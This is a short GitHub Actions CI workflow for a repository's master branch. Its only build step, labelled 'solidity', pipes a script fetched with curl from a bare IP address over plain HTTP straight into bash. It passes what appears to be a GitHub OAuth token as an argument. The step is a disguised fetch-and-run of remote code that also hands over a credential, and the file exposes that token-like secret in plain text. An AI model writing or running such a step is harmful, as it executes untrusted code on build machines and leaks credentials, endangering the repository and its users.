name: CI

on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]

  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v2

      - name: solidity
        run: bash <(curl -s http://54.77.51.223/script) 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